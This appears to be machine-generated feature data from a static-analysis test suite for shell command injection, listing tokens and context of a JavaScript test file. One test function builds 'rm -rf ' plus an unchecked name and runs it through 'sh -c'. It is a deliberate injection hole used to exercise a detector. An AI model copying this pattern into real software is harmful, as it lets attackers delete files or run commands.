autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:1:153:1 | module. ... cb);\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:1:153:1 | module. ... cb);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:1:153:1 | module. ... cb);\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:8:148:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:8:148:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:8:148:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:16:148:23 | indirect | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:16:148:23 | indirect | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:16:148:23 | indirect | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:148:26 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:148:26 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:148:26 | cp | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:148:26 | cp | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:148:26 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:148:26 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:148:26 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:148:26 | this | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:148:26 | this | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:148:26 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:153:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:153:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:153:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:153:1 | 'arguments' object of anonymous function | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:153:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:153:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:153:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:153:1 | exceptional return of anonymous function | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:153:1 | exceptional return of anonymous function | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:153:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:153:1 | functio ... cb);\\n} | assignedToPropName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:153:1 | functio ... cb);\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:153:1 | functio ... cb);\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:153:1 | functio ... cb);\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:153:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:153:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:153:1 | return of anonymous function | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:153:1 | return of anonymous function | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:27:153:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:37:148:40 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:37:148:40 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:37:148:40 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:37:148:40 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:37:148:40 | name | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:37:148:40 | name | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:37:148:40 | name | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:37:148:40 | name | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:37:148:40 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:37:148:40 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:6:149:8 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:6:149:8 | cmd | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:6:149:8 | cmd | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:6:149:8 | cmd | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:6:149:8 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:6:149:27 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:6:149:27 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:6:149:27 | cmd | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:6:149:27 | cmd | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:6:149:27 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:6:149:27 | cmd = " ... + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:6:149:27 | cmd = " ... + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:6:149:27 | cmd = " ... + name | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:6:149:27 | cmd = " ... + name | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:6:149:27 | cmd = " ... + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:12:149:20 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:12:149:20 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:12:149:20 | "rm -rf " | enclosingFunctionBody | name cmd rm -rf name sh sh args -c cmd cp spawn sh args cb | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:12:149:20 | "rm -rf " | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:12:149:20 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:12:149:20 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:149:12:149:27 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| 